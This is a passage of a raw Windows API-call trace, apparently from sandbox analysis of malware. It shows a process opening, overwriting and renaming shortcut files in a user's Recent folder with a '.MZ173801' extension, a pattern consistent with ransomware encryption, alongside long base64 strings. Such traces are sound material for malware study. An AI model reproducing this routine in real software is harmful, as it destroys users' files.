lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0106.911] GetCurrentThreadId () returned 0x1358 [0106.911] GetCurrentThreadId () returned 0x1358 [0106.911] GetCurrentThreadId () returned 0x1358 [0106.911] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\8MMQ.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\8mmq.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.911] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0106.911] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.912] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x592 [0106.912] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.912] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x592, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x592, lpOverlapped=0x0) returned 1 [0106.913] CloseHandle (hObject=0x3f4) returned 1 [0106.913] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\8MMQ.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\8mmq.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.913] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x592, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x592, lpOverlapped=0x0) returned 1 [0106.914] CloseHandle (hObject=0x3f4) returned 1 [0106.915] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\8MMQ.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\8mmq.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\8MMQ.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\8mmq.lnk.mz173801")) returned 1 [0106.916] GetCurrentThreadId () returned 0x1358 [0106.916] GetCurrentThreadId () returned 0x1358 [0106.916] GetCurrentThreadId () returned 0x1358 [0106.916] GetCurrentThreadId () returned 0x1358 [0106.916] GetCurrentThreadId () returned 0x1358 [0106.916] GetCurrentThreadId () returned 0x1358 [0106.916] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7603b36d, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x7603b36d, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x7603b36d, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3dd, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="8nrtvJPSXWSOarKar.lnk", cAlternateFileName="8NRTVJ~1.LNK")) returned 1 [0106.916] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0106.916] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0106.916] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\8nrtvJPSXWSOarKar.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\8nrtvjpsxwsoarkar.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7603b36d, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x7603b36d, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x7603b36d, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3dd)) returned 1 [0106.916] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.916] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0106.917] GetCurrentThreadId () returned 0x1358 [0106.917] GetCurrentThreadId () returned 0x1358 [0106.917] GetCurrentThreadId () returned 0x1358 [0106.917] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.917] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0106.917] GetCurrentThreadId () returned 0x1358 [0106.917] GetCurrentThreadId () returned 0x1358 [0106.918] GetCurrentThreadId () returned 0x1358 [0106.918] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\8nrtvJPSXWSOarKar.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\8nrtvjpsxwsoarkar.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.918] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0106.918] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.918] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x3dd [0106.918] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.918] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x3dd, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x3dd, lpOverlapped=0x0) returned 1 [0106.919] CloseHandle (hObject=0x3f4) returned 1 [0106.919] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\8nrtvJPSXWSOarKar.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\8nrtvjpsxwsoarkar.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.920] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x3dd, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x3dd, lpOverlapped=0x0) returned 1 [0106.921] CloseHandle (hObject=0x3f4) returned 1 [0106.922] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\8nrtvJPSXWSOarKar.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\8nrtvjpsxwsoarkar.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\8nrtvJPSXWSOarKar.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\8nrtvjpsxwsoarkar.lnk.mz173801")) returned 1 [0106.922] GetCurrentThreadId () returned 0x1358 [0106.922] GetCurrentThreadId () returned 0x1358 [0106.922] GetCurrentThreadId () returned 0x1358 [0106.922] GetCurrentThreadId () returned 0x1358 [0106.922] GetCurrentThreadId () returned 0x1358 [0106.922] GetCurrentThreadId () returned 0x1358 [0106.922] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea1bf4ff, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea1bf4ff, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea1bf4ff, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x288, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="93FAioEJ-r.lnk", cAlternateFileName="93FAIO~1.LNK")) returned 1 [0106.922] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0106.922] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0106.922] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\93FAioEJ-r.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\93faioej-r.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea1bf4ff, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea1bf4ff, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea1bf4ff, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x288)) returned 1 [0106.923] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.923] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 